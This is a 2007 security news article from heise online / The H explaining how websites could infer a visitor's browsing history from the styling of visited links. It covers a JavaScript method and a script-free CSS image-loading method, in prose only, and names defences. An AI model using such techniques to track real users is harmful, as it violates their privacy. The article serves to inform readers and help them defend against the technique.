In association with heise online

02 March 2007, 14:10

Attackers able to read out list of visited web pages

  • Twitter
  • Facebook
  • submit to slashdot
  • StumbleUpon
  • submit to reddit

"I know which web sites you visited last summer." Whilst it is not possible to determine the exact time of a visit, a web site may use a browser's history to find out if a certain site has been launched in the past. This could, for instance, help phishers to determine the bank of a potential victim or allow internet vendors to find out which competitive sites a user has visited.

The problem has to do with the way browsers store information on the usage of links. Visited links are displayed in a different colour than links that have not been activated. Such changes in colour are based on stylesheet settings for the respective HTML document and are stored by the browser as attributes in the history. Some months ago, security specialist Jeremiah Grossman published a sample program which can be used to exploit this behaviour.

Grossman built a JavaScript with quite a long list of potential web sites; when launching the sites, he tested the colour scheme in the stylesheet, which provided information on which sites had been visited. While this does not mean that the history is actually read out, a list of sufficient length makes it possible to test key sites.

At present, the program only works with Mozilla derivatives (Firefox, Netscape etc.) and Safari. An online demo to test one's own history is available on The only way to avoid this special kind of attack is to disable JavaScript.

However, there is also a way to sniff out the browser history without JavaScript; the first people to present this method have been researchers from the University of Indiana. An attacker may use stylesheet properties to reload different background images, depending on whether the site was visited in the past or not. Manipulated HTML pages allow attackers to track the history without any script just by monitoring if the page reloads images. Since yesterday, a demo has been available on, implemented by RSnake; it works with Firefox and also Internet Explorer 7 and Opera 9.10. The plug-in SafeHistory provided by Stanford University provides protection against such visited-link-based tracking techniques.

See also:


Print Version | Send by email | Permalink:

  • July's Community Calendar

The H Open

The H Security

The H Developer

The H Internet Toolkit